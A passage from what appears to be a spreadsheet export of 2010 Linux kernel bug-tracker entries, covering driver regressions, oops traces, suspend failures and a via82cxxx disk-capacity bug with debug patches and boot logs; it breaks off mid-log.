    <t>The watchdog driver for the SUPERIO chip winbond w83627ehf does not work. If you open /dev/watchdog and write a character to /dev/watchdog than the watchdog will be triggered. However the watchdog will not trigger the hardware RESET after the timeout, because the watchdog has never been enabled. I have included a patch file which will solve this problem. When the watchdog will be triggered for the first time, it will also check whether the watchdog has been enabled. If not it will enable the watchdog.</t>
  </si>
  <si>
    <t>3.9.2</t>
  </si>
  <si>
    <t>iwlwifi disconnects several times in a row</t>
  </si>
  <si>
    <t>2010-03-19 01:14 UTC</t>
  </si>
  <si>
    <t>2010-04-11 10:35 UTC</t>
  </si>
  <si>
    <t>Created attachment 25600 [details] dmesg of x61s thinkpad to regain connection need to reconnect with nm-applet: message on connection lost: [20396.771335] iwlagn 0000:03:00.0: iwl_tx_agg_start on ra = 00:25:84:02:e3:39 tid = 0 funny thing is that connections that where already alive still work for some seconds but then die off. no new ping nothing. need to check if reproducible with wpa_supplicant and dhclient. 2.6.32.10 is also affected. eventually both last stable release seem to have made the situation worth as now it happens much more often. lspci -vv -s 03:00.0 03:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN Network Connection (rev 61) Subsystem: Intel Corporation Device 1111 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 29 Region 0: Memory at f7f00000 (64-bit, non-prefetchable) [size=8K] Capabilities: &lt;access denied&gt; Kernel driver in use: iwlagn</t>
  </si>
  <si>
    <t>Crashes after a few stacktraces in flush and kswapd</t>
  </si>
  <si>
    <t>2.6.33 2.6.32</t>
  </si>
  <si>
    <t>2010-03-19 09:46 UTC</t>
  </si>
  <si>
    <t>2010-07-13 02:04 UTC</t>
  </si>
  <si>
    <t>Created attachment 25607 [details] traces befor the crash with 2.6.32.10 Hi, we've seen these traces and crashes afterwards on numerous hosts now with kernels 2.6.32 upwards. I assume it is nfs related as many nfs-calls appear in the trace. The servers are moderatly loaded file servers with Adaptec 52445 controllers and Quad Xeon E5240 with 8GB Ram. River has about 120 exports from 3 filesystems, simon has 4500 exports in 7 filesystems. I've also reported this to the debian bugtracker as http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=574348 as this is Debian Lenny. Any hints how to further debug this would be greatly appreciated - especially the students are not very happy when they loose their sessions for a while ;). We are now back to 2.6.30 as that seems to work, but has other problems (no working quota for instance) First attachment was 2.6.32.10, second 2.6.33 on a different host.</t>
  </si>
  <si>
    <t>[Bisected Regression in 2.6.32.8] i915 with KMS enabled causes memorycorruption when resuming from suspend-to-disk</t>
  </si>
  <si>
    <t>2010-03-19 19:26 UTC</t>
  </si>
  <si>
    <t>2010-10-28 23:31 UTC</t>
  </si>
  <si>
    <t>Chris Wilson</t>
  </si>
  <si>
    <t>Subject : [Bisected Regression in 2.6.32.8] i915 with KMS enabled causes memorycorruption when resuming from suspend-to-disk Submitter : "M. Vefa Bicakci" &lt;bicave@superonline.com&gt; Date : 2010-03-13 5:11 Message-ID : 4B9B1E8F.5090806@superonline.com References : http://marc.info/?l=linux-kernel&amp;m=126845754409543&amp;w=2 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline. Caused by: commit d8e0902806c0bd2ccc4f6a267ff52565a3ec933b Author: Chris Wilson &lt;chris@chris-wilson.co.uk&gt; Date: Wed Jan 27 13:36:32 2010 +0000 drm/i915: Selectively enable self-reclaim First-Bad-Commit : d8e0902806c0bd2ccc4f6a267ff52565a3ec933b</t>
  </si>
  <si>
    <t>2.6.34-rc1: Badness at fs/proc/generic.c:316</t>
  </si>
  <si>
    <t>2010-03-20 19:41 UTC</t>
  </si>
  <si>
    <t>2010-07-09 22:34 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.34-rc1: Badness at fs/proc/generic.c:316 Submitter : Christian Kujau &lt;lists@nerdbynature.de&gt; Date : 2010-03-13 23:53 Message-ID : alpine.DEB.2.01.1003131544340.5493@bogon.housecafe.de References : http://marc.info/?l=linux-kernel&amp;m=126852442903680&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.34-rc1: regression: ^Z no longer stops sound</t>
  </si>
  <si>
    <t>2010-03-20 19:53 UTC</t>
  </si>
  <si>
    <t>2010-06-13 11:59 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.34-rc1: regression: ^Z no longer stops sound Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2010-03-14 7:58 Message-ID : 20100314075831.GA13457@elf.ucw.cz References : http://marc.info/?l=linux-kernel&amp;m=126855353122623&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>cannot halt my computer.</t>
  </si>
  <si>
    <t>2.6.34-git8 &amp; 2.6.34-rc2</t>
  </si>
  <si>
    <t>2010-03-21 14:47 UTC</t>
  </si>
  <si>
    <t>blackdream</t>
  </si>
  <si>
    <t>HI. I'm using Gentoo and my kernel is wget from the kernel.org. When I try to use the kernel (2.6.34-rc2).I found that I can't shutdown my Gentoo,but I can reboot it.The error imformation is "/etc/ini.d/shutdown.sh : line 9". and I try to use the 2.6.33.1,with the same ".config",and it work well. so,I think this is a bug. CPU:AMD althlon 64x2 5000+ P.S. about a weak ago ,I using 2.6.34-git6.It's alsa working very well.... P.S. I'm sorry my english is poor...</t>
  </si>
  <si>
    <t>CONFIG_NO_BOOTMEM woes, 2.6.34-rc1</t>
  </si>
  <si>
    <t>2010-03-21 20:46 UTC</t>
  </si>
  <si>
    <t>2010-04-08 20:16 UTC</t>
  </si>
  <si>
    <t>Subject : CONFIG_NO_BOOTMEM woes, 2.6.34-rc1 Submitter : Avi Kivity &lt;avi@redhat.com&gt; Date : 2010-03-15 15:28 Message-ID : 4B9E5211.9000204@redhat.com References : http://marc.info/?l=linux-kernel&amp;m=126866691701926&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[BUG] SLOB breaks Crypto</t>
  </si>
  <si>
    <t>2010-03-21 20:53 UTC</t>
  </si>
  <si>
    <t>2010-05-22 17:59 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] SLOB breaks Crypto Submitter : michael-dev@fami-braun.de Date : 2010-03-15 13:39 Message-ID : 4B9E38AF.70309@fami-braun.de References : http://marc.info/?l=linux-kernel&amp;m=126866044724539&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>r8169: Reports incorrect link information</t>
  </si>
  <si>
    <t>2010-03-22 04:19 UTC</t>
  </si>
  <si>
    <t>Michael B. Trausch</t>
  </si>
  <si>
    <t>2011-01-09 10:16 UTC</t>
  </si>
  <si>
    <t>First note that it is possible that this bug is more than this; I cannot force settings on my internet Ethernet interface using this driver either. I need to boot into 2.6.32 to see if it possible there. In 2.6.32, when I plug into a gigabit Ethernet network, the driver reports a 1000Mbit, full duplex link. However, in 2.6.33, only a 10Mbit, half-duplex link is reported. When I run a speed test on the network, though, I am able to get the same actual transfer speeds in either case, leading me to believe that the driver is bringing up the hardware just fine, but misreporting information. The first version that I have which has the problem is 2.6.33; I have not yet had a chance to bisect the kernel tree to find the commit that presents the problem. I should have time to do this in the next 24 hours.</t>
  </si>
  <si>
    <t>Acer Timeline TravelMate 8571: suspend to RAM fails</t>
  </si>
  <si>
    <t>2.6.31-20</t>
  </si>
  <si>
    <t>2010-03-22 21:35 UTC</t>
  </si>
  <si>
    <t>Stefan Koch</t>
  </si>
  <si>
    <t>2012-06-25 20:43 UTC</t>
  </si>
  <si>
    <t>With my Acer TravelMate 8571-352G25Mn suspend to RAM does not work, too. (suspend to HDD works) Thats the TravelMate with the Core2Solo SU3500 CPU shipped with Linpus Linux (terminal only) I'm using ubuntu 9.10 amd64 with 2.6.31-20-generic linux kernel. The latest apt-get update; apt-get dist-upgrade was today. ------------- If I launch a suspend, the laptop goes in suspend (the power led is blinking) if I press the power button the laptop makes a reboot/restart. Steps for the last suspend: apt-get update apt-get dist-upgrade REBOOT (normal) REBOOT (normal) Open gnome-terminal THEN sudo su sh -c "sync; echo 1 &gt; /sys/power/pm_trace; pm-suspend" NOW suspend ERROR! open gnome-terminal sudo su dmesg &gt; dmesg.txt The dmesg.txt file is attached here... I use ubuntu 9.10 amd64 with 2.6.31-20-generic linux kernel. The latest apt-get update; apt-get dist-upgrade was today. Thanks... See here, too: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/405120</t>
  </si>
  <si>
    <t>NULL pointer deref in task_is_waking</t>
  </si>
  <si>
    <t>2010-03-23 04:04 UTC</t>
  </si>
  <si>
    <t>2010-04-20 03:39 UTC</t>
  </si>
  <si>
    <t>LKML mail describing the problem: http://article.gmane.org/gmane.linux.ports.ppc.embedded/33999 Kerneloops link http://www.kerneloops.org/raw.php?rawid=2787010&amp;msgid=http://mid.gmane.org/20100321043725.GA21566@amit-x200.redhat.com The .config is available in the mail linked to above. Crash log: BUG: unable to handle kernel NULL pointer dereference at (null) IP: [&lt;ffffffff8101f4dc&gt;] task_is_waking+0x1/0x1f PGD 3d261067 PUD 3d013067 PMD 0 Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC last sysfs file: /sys/devices/virtual/block/ram13/removable CPU 0 Modules linked in: Pid: 573, comm: console_check Not tainted 2.6.34-rc2 #102 /Bochs RIP: 0010:[&lt;ffffffff8101f4dc&gt;] [&lt;ffffffff8101f4dc&gt;] task_is_waking+0x1/0x1f RSP: 0018:ffff88003bdf5b48 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff81646e30 RDX: ffff88003bdf5b78 RSI: ffff88003bdf5ba0 RDI: 0000000000000000 RBP: ffff88003bdf5b78 R08: 0000000000000000 R09: ffffffff81646e08 R10: 0000000000000046 R11: 0000000000001130 R12: 00000000001d1d00 R13: 0000000000000000 R14: ffff88003bdf5ba0 R15: 000000000000000f FS: 00007f330731b6f0(0000) GS:ffff880003800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 000000003be78000 CR4: 00000000000006b0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process console_check (pid: 573, threadinfo ffff88003bdf4000, task ffff88003bc3a2d0) Stack: ffff88003bdf5b78 ffffffff8102058e 0000000000000000 0000000000000000 &lt;0&gt; 0000000000000000 0000000000000000 ffff88003bdf5bd8 ffffffff81026f03 &lt;0&gt; ffff88003ead8cd8 ffff88003eb10490 ffff88003bdf5bd8 ffffffff8118cea9 Call Trace: [&lt;ffffffff8102058e&gt;] ? task_rq_lock+0x24/0x98 [&lt;ffffffff81026f03&gt;] try_to_wake_up+0x4b/0x33b [&lt;ffffffff8118cea9&gt;] ? resize_console+0x25/0x95 [&lt;ffffffff8102721f&gt;] wake_up_process+0x10/0x12 [&lt;ffffffff8118c18e&gt;] hvc_kick+0x1a/0x1c [&lt;ffffffff8118cbb4&gt;] hvc_open+0xf6/0x102 [&lt;ffffffff81179f7d&gt;] tty_open+0x369/0x4f0 [&lt;ffffffff810a47e8&gt;] chrdev_open+0x127/0x148 [&lt;ffffffff810a46c1&gt;] ? chrdev_open+0x0/0x148 [&lt;ffffffff810a066b&gt;] __dentry_open+0x154/0x28a [&lt;ffffffff810a0866&gt;] nameidata_to_filp+0x3a/0x4b [&lt;ffffffff810ab9cb&gt;] do_last+0x473/0x5ba [&lt;ffffffff810abd12&gt;] do_filp_open+0x200/0x602 [&lt;ffffffff8104e43b&gt;] ? get_lock_stats+0x20/0x4c [&lt;ffffffff8124fa30&gt;] ? _raw_spin_unlock+0x45/0x52 [&lt;ffffffff810b4d68&gt;] ? spin_unlock+0x9/0xb [&lt;ffffffff810b5455&gt;] ? alloc_fd+0x111/0x123 [&lt;ffffffff810a045a&gt;] do_sys_open+0x57/0xd7 [&lt;ffffffff810a0503&gt;] sys_open+0x1b/0x1d [&lt;ffffffff81001ec2&gt;] system_call_fastpath+0x16/0x1b Code: c5 e8 ef 9b 09 00 48 83 c3 08 48 83 3b 00 75 c4 4c 89 e7 48 c7 c6 87 a7 4c 81 e8 69 95 09 00 41 58 31 c0 5b 41 5c 41 5d c9 c3 55 &lt;48&gt; 8b 17 31 c0 48 89 e5 48 81 fa 00 01 00 00 75 0b 8b 47 14 d1 RIP [&lt;ffffffff8101f4dc&gt;] task_is_waking+0x1/0x1f RSP &lt;ffff88003bdf5b48&gt; CR2: 0000000000000000 ---[ end trace a8d89f6ae287538e ]--- note: console_check[573] exited with preempt_count 2 BUG: scheduling while atomic: console_check/573/0x10000002 INFO: lockdep is turned off. Modules linked in: Pid: 573, comm: console_check Tainted: G D 2.6.34-rc2 #102 Call Trace: [&lt;ffffffff8104f44e&gt;] ? __debug_show_held_locks+0x1b/0x24 [&lt;ffffffff81024f1b&gt;] __schedule_bug+0x72/0x77 [&lt;ffffffff8124d073&gt;] schedule+0xcc/0x69f [&lt;ffffffff81027f95&gt;] __cond_resched+0x13/0x1f [&lt;ffffffff8124d6e8&gt;] _cond_resched+0x16/0x1d [&lt;ffffffff81085874&gt;] unmap_vmas+0x733/0x7b1 [&lt;ffffffff8108a474&gt;] exit_mmap+0x88/0xdc [&lt;ffffffff8102b1ce&gt;] mmput+0x43/0xb4 [&lt;ffffffff8102ed92&gt;] exit_mm+0x103/0x110 [&lt;ffffffff8118b138&gt;] ? spin_unlock_irq+0x9/0xb [&lt;ffffffff8103067d&gt;] do_exit+0x1e7/0x68c [&lt;ffffffff8102d4ca&gt;] ? spin_unlock_irqrestore+0x9/0xb [&lt;ffffffff8102e14c&gt;] ? kmsg_dump+0x150/0x16a [&lt;ffffffff810059be&gt;] ? oops_end+0x44/0x94 [&lt;ffffffff81005a09&gt;] oops_end+0x8f/0x94 [&lt;ffffffff81019f80&gt;] no_context+0x1f7/0x206 [&lt;ffffffff81017450&gt;] ? kvm_clock_read+0x3e/0x5c [&lt;ffffffff8101a11c&gt;] __bad_area_nosemaphore+0x18d/0x1b0 [&lt;ffffffff8101a31d&gt;] ? do_page_fault+0xaa/0x295 [&lt;ffffffff8101a14d&gt;] bad_area_nosemaphore+0xe/0x10 [&lt;ffffffff8101a3bc&gt;] do_page_fault+0x149/0x295 [&lt;ffffffff81250435&gt;] page_fault+0x25/0x30 [&lt;ffffffff8101f4dc&gt;] ? task_is_waking+0x1/0x1f [&lt;ffffffff8124fa7f&gt;] ? _raw_spin_unlock_irqrestore+0x42/0x79 [&lt;ffffffff8102058e&gt;] ? task_rq_lock+0x24/0x98 [&lt;ffffffff81026f03&gt;] try_to_wake_up+0x4b/0x33b [&lt;ffffffff8118cea9&gt;] ? resize_console+0x25/0x95 [&lt;ffffffff8102721f&gt;] wake_up_process+0x10/0x12 [&lt;ffffffff8118c18e&gt;] hvc_kick+0x1a/0x1c [&lt;ffffffff8118cbb4&gt;] hvc_open+0xf6/0x102 [&lt;ffffffff81179f7d&gt;] tty_open+0x369/0x4f0 [&lt;ffffffff810a47e8&gt;] chrdev_open+0x127/0x148 [&lt;ffffffff810a46c1&gt;] ? chrdev_open+0x0/0x148 [&lt;ffffffff810a066b&gt;] __dentry_open+0x154/0x28a [&lt;ffffffff810a0866&gt;] nameidata_to_filp+0x3a/0x4b [&lt;ffffffff810ab9cb&gt;] do_last+0x473/0x5ba [&lt;ffffffff810abd12&gt;] do_filp_open+0x200/0x602 [&lt;ffffffff8104e43b&gt;] ? get_lock_stats+0x20/0x4c [&lt;ffffffff8124fa30&gt;] ? _raw_spin_unlock+0x45/0x52 [&lt;ffffffff810b4d68&gt;] ? spin_unlock+0x9/0xb [&lt;ffffffff810b5455&gt;] ? alloc_fd+0x111/0x123 [&lt;ffffffff810a045a&gt;] do_sys_open+0x57/0xd7 [&lt;ffffffff810a0503&gt;] sys_open+0x1b/0x1d [&lt;ffffffff81001ec2&gt;] system_call_fastpath+0x16/0x1b EXT4-fs (sda1): mounted filesystem with ordered data mode BUG: unable to handle kernel NULL pointer dereference at (null) IP: [&lt;ffffffff8101f4dc&gt;] task_is_waking+0x1/0x1f PGD 3e7ab067 PUD 3ce84067 PMD 0 Oops: 0000 [#2] PREEMPT SMP DEBUG_PAGEALLOC last sysfs file: /sys/devices/pci0000:00/0000:00:01.1/host0/target0:0:0/0:0:0:0/block/sda/sda2/dev CPU 1 Modules linked in: Pid: 951, comm: agetty Tainted: G D 2.6.34-rc2 #102 /Bochs RIP: 0010:[&lt;ffffffff8101f4dc&gt;] [&lt;ffffffff8101f4dc&gt;] task_is_waking+0x1/0x1f RSP: 0018:ffff88003cdd9b48 EFLAGS: 00010246 RAX: 0000000000000001 RBX: 0000000000000000 RCX: 0000000000000000 RDX: ffff88003cdd9bb8 RSI: ffff88003cdd9ba0 RDI: 0000000000000000 RBP: ffff88003cdd9b78 R08: ffff88003f80d168 R09: ffff88003ef60018 R10: 0000000000000046 R11: 0000000000000292 R12: 00000000001d1d00 R13: 0000000000000000 R14: ffff88003cdd9ba0 R15: 000000000000000f FS: 00007fd200b486f0(0000) GS:ffff880003a00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 000000003f189000 CR4: 00000000000006a0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process agetty (pid: 951, threadinfo ffff88003cdd8000, task ffff88003d2f8000) Stack: ffff88003cdd9b78 ffffffff8102058e 0000000000000000 0000000000000000 &lt;0&gt; 0000000000000000 0000000000000001 ffff88003cdd9bd8 ffffffff81026f03 &lt;0&gt; 0000000000000000 0000000000000046 ffff88003ef60018 0000000000000046 Call Trace: [&lt;ffffffff8102058e&gt;] ? task_rq_lock+0x24/0x98 [&lt;ffffffff81026f03&gt;] try_to_wake_up+0x4b/0x33b [&lt;ffffffff8102721f&gt;] wake_up_process+0x10/0x12 [&lt;ffffffff8118c18e&gt;] hvc_kick+0x1a/0x1c [&lt;ffffffff8118cb1b&gt;] hvc_open+0x5d/0x102 [&lt;ffffffff81179f7d&gt;] tty_open+0x369/0x4f0 [&lt;ffffffff810a47e8&gt;] chrdev_open+0x127/0x148 [&lt;ffffffff810a2899&gt;] ? spin_unlock+0x9/0xb [&lt;ffffffff810a46c1&gt;] ? chrdev_open+0x0/0x148 [&lt;ffffffff810a066b&gt;] __dentry_open+0x154/0x28a [&lt;ffffffff810a0866&gt;] nameidata_to_filp+0x3a/0x4b [&lt;ffffffff810ab9cb&gt;] do_last+0x473/0x5ba [&lt;ffffffff810abd12&gt;] do_filp_open+0x200/0x602 [&lt;ffffffff8124fa30&gt;] ? _raw_spin_unlock+0x45/0x52 [&lt;ffffffff810b4d68&gt;] ? spin_unlock+0x9/0xb [&lt;ffffffff810b5455&gt;] ? alloc_fd+0x111/0x123 [&lt;ffffffff810a045a&gt;] do_sys_open+0x57/0xd7 [&lt;ffffffff810a0503&gt;] sys_open+0x1b/0x1d [&lt;ffffffff81001ec2&gt;] system_call_fastpath+0x16/0x1b Code: c5 e8 ef 9b 09 00 48 83 c3 08 48 83 3b 00 75 c4 4c 89 e7 48 c7 c6 87 a7 4c 81 e8 69 95 09 00 41 58 31 c0 5b 41 5c 41 5d c9 c3 55 &lt;48&gt; 8b 17 31 c0 48 89 e5 48 81 fa 00 01 00 00 75 0b 8b 47 14 d1 RIP [&lt;ffffffff8101f4dc&gt;] task_is_waking+0x1/0x1f RSP &lt;ffff88003cdd9b48&gt; CR2: 0000000000000000 ---[ end trace a8d89f6ae287538f ]--- note: agetty[951] exited with preempt_count 2</t>
  </si>
  <si>
    <t>[BUG] percpu misaligned allocation</t>
  </si>
  <si>
    <t>2010-03-24 20:52 UTC</t>
  </si>
  <si>
    <t>2010-04-08 19:59 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] percpu misaligned allocation Submitter : Frederic Weisbecker &lt;fweisbec@gmail.com&gt; Date : 2010-03-18 4:49 Message-ID : 20100318044930.GC5045@nowhere References : http://marc.info/?l=linux-kernel&amp;m=126888780031992&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.34-rc1 breaks via82cxxx Host Protected Area</t>
  </si>
  <si>
    <t>2010-03-27 14:36 UTC</t>
  </si>
  <si>
    <t>2010-04-01 01:11 UTC</t>
  </si>
  <si>
    <t>The kernel fails to see the entire disk with 2.6.34-rc2 with VIA vt82c586b chipset. I tracked it down to commit f931a5d5785d7b7c44871bd7ad2762e29dfddf29 "via82cxxx: workaround h/w bugs" and reverting just that one solves the problem, or just commenting out just one outb write in that change. via82cxxx 0000:00:07.1: VIA vt82c586b (rev 41) IDE UDMA33 via82cxxx 0000:00:07.1: IDE controller (0x1106:0x0571 rev 0x06) via82cxxx 0000:00:07.1: not 100% native mode: will probe irqs later Note the kernel panic is intentional as I'm given the test kernel an invalid root device, so that I can suspend to disk, try a kernel, resume and pick up where I left off. It does have a side benefit of dumping the size of all partitions. 2.6.34-rc2 unmodified, fails and sees 30985416 KiB for the last partition. ide-gd driver 1.18 hda: max request size: 128KiB hda: 66055248 sectors (33820 MB) w/7936KiB Cache, CHS=65531/16/63 hda: cache flushes supported hda: hda1 hda2 hda3 hda: p3 size 236037312 exceeds device capacity, enabling native capacity hda: p3 size 236037312 exceeds device capacity, limited to end of disk ide-cd driver 5.00 ... Please append a correct "root=" boot option; here are the available partitions: 0300 33027624 hda driver: ide-gd 0301 49391 hda1 0302 1992816 hda2 0303 30985416 hda3 Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(22,2) 2.6.34-rc2 with patch revered, correct size 118018656 ide-gd driver 1.18 hda: max request size: 128KiB hda: Host Protected Area detected. current capacity is 66055248 sectors (33820 MB) native capacity is 240121728 sectors (122942 MB) hda: 66055248 sectors (33820 MB) w/7936KiB Cache, CHS=65531/16/63 hda: cache flushes supported hda: hda1 hda2 hda3 hda: p3 size 236037312 exceeds device capacity, enabling native capacity hda: detected capacity change from 33820286976 to 122942324736 ide-cd driver 5.00 0300 120060864 hda driver: ide-gd 0301 49391 hda1 0302 1992816 hda2 0303 118018656 hda3 Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(22,2) Here are two debug patches, the first adds debug prints and the second disables the problematic write, I have the output of both included. &gt;From dac7d14ce1f227d8a084c3ec218ea1430bffdc57 Mon Sep 17 00:00:00 2001 From: David Fries &lt;david@fries.net&gt; Date: Thu, 25 Mar 2010 19:51:31 -0500 Subject: [PATCH 1/2] fails: add print messages add print messages for debugging --- drivers/ide/via82cxxx.c | 5 +++++ 1 files changed, 5 insertions(+), 0 deletions(-) diff --git a/drivers/ide/via82cxxx.c b/drivers/ide/via82cxxx.c index e65d010..ccd5640 100644 --- a/drivers/ide/via82cxxx.c +++ b/drivers/ide/via82cxxx.c @@ -409,6 +409,8 @@ static void via_write_devctl(ide_hwif_t *hwif, u8 ctl) outb(ctl, hwif-&gt;io_ports.ctl_addr); outb(vdev-&gt;cached_device[hwif-&gt;channel], hwif-&gt;io_ports.device_addr); + printk("via_write_devctl write %u, %lu\n", + vdev-&gt;cached_device[hwif-&gt;channel], hwif-&gt;io_ports.device_addr); } static void __via_dev_select(ide_drive_t *drive, u8 select) @@ -442,6 +444,9 @@ static void via_tf_load(ide_drive_t *drive, struct ide_taskfile *tf, u8 valid) outb(tf-&gt;lbah, io_ports-&gt;lbah_addr); if (valid &amp; IDE_VALID_DEVICE) __via_dev_select(drive, tf-&gt;device); + printk("via_tf_load write tf-&gt;device %u in place of tf-&gt;device %u\n" + " value io_ports-&gt;device_addr %lu\n", + tf-&gt;device, tf-&gt;device, io_ports-&gt;device_addr); } const struct ide_tp_ops via_tp_ops = { -- 1.7.0 Uniform Multi-Platform E-IDE driver via82cxxx 0000:00:07.1: VIA vt82c586b (rev 41) IDE UDMA33 via82cxxx 0000:00:07.1: IDE controller (0x1106:0x0571 rev 0x06) via82cxxx 0000:00:07.1: not 100% native mode: will probe irqs later ide: disallowing DMA for hda ide: disallowing DMA for hdb ide0: BM-DMA at 0xe400-0xe407 ide: disallowing DMA for hdc ide: disallowing DMA for hdd ide1: BM-DMA at 0xe408-0xe40f via_write_devctl write 160, 502 via_write_devctl write 176, 502 via_write_devctl write 160, 502 hda: Maxtor 6Y120P0, ATA DISK drive via_write_devctl write 176, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_write_devctl write 176, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_write_devctl write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_write_devctl write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 ide1: no devices on the port via_write_devctl write 160, 502 via_write_devctl write 0, 374 ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 ide1 at 0x170-0x177,0x376 on irq 15 ide_generic: please use "probe_mask=0x3f" module parameter for probing all legacy ISA IDE ports ide-gd driver 1.18 hda: max request size: 128KiB via_write_devctl write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 175 in place of tf-&gt;device 175 value io_ports-&gt;device_addr 502 via_write_devctl write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 160 in place of tf-&gt;device 160 value io_ports-&gt;device_addr 502 via_write_devctl write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 160 in place of tf-&gt;device 160 value io_ports-&gt;device_addr 502 via_write_devctl write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 224 in place of tf-&gt;device 224 value io_ports-&gt;device_addr 502 via_write_devctl write 224, 502 hda: 66055248 sectors (33820 MB) w/7936KiB Cache, CHS=65531/16/63 via_write_devctl write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 160 in place of tf-&gt;device 160 value io_ports-&gt;device_addr 502 via_write_devctl write 160, 502 hda: cache flushes supported hda:via_write_devctl write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 224 in place of tf-&gt;device 224 value io_ports-&gt;device_addr 502 hda1 hda2 hda3 hda: p3 size 236037312 exceeds device capacity, enabling native capacity via_write_devctl write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 224 in place of tf-&gt;device 224 value io_ports-&gt;device_addr 502 via_write_devctl write 224, 502 via_write_devctl write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 227 in place of tf-&gt;device 227 value io_ports-&gt;device_addr 502 via_write_devctl write 227, 502 hda: p3 size 236037312 exceeds device capacity, limited to end of disk via_write_devctl write 160, 502 via_tf_load write tf-&gt;device 0 in place of tf-&gt;device 0 value io_ports-&gt;device_addr 502 via_tf_load write tf-&gt;device 160 in place of tf-&gt;device 160 value io_ports-&gt;device_addr 502 via_write_devctl write 160, 502 ide-cd driver 5.00 VFS: Cannot open root device "1602" or unknown-block(22,2) Please append a correct "root=" boot option; here are the available partitions: 0300 33027624 hda driver: ide-gd 0301 49391 hda1 0302 1992816 hda2 0303 30985416 hda3 Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(22,2) &gt;From 72da5cd66e1f857fbe6afa0e92634e8adf684737 Mon Sep 17 00:00:00 2001 From: David Fries &lt;david@fries.net&gt; Date: Thu, 25 Mar 2010 20:07:19 -0500 Subject: [PATCH 2/2] via82cxxx works: skip write This fixes via82cxxx host protected area problems. --- drivers/ide/via82cxxx.c | 4 +++- 1 files changed, 3 insertions(+), 1 deletions(-) diff --git a/drivers/ide/via82cxxx.c b/drivers/ide/via82cxxx.c index ccd5640..d598b63 100644 --- a/drivers/ide/via82cxxx.c +++ b/drivers/ide/via82cxxx.c @@ -408,8 +408,10 @@ static void via_write_devctl(ide_hwif_t *hwif, u8 ctl) struct via82cxxx_dev *vdev = hwif-&gt;host-&gt;host_priv; outb(ctl, hwif-&gt;io_ports.ctl_addr); + /* outb(vdev-&gt;cached_device[hwif-&gt;channel], hwif-&gt;io_ports.device_addr); - printk("via_write_devctl write %u, %lu\n", + */ + printk("via_write_devctl skip write %u, %lu\n", vdev-&gt;cached_device[hwif-&gt;channel], hwif-&gt;io_ports.device_addr); } -- 1.7.0 Uniform Multi-Platform E-IDE driver via82cxxx 0000:00:07.1: VIA vt82c586b (rev 41) IDE UDMA33 via82cxxx 0000:00:07.1: IDE controller (0x1106:0x0571 rev 0x06) via82cxxx 0000:00:07.1: not 100% native mode: will probe irqs later ide: disallowing DMA for hda ide: disallowing DMA for hdb ide0: BM-DMA at 0xe400-0xe407 ide: disallowing DMA for hdc ide: disallowing 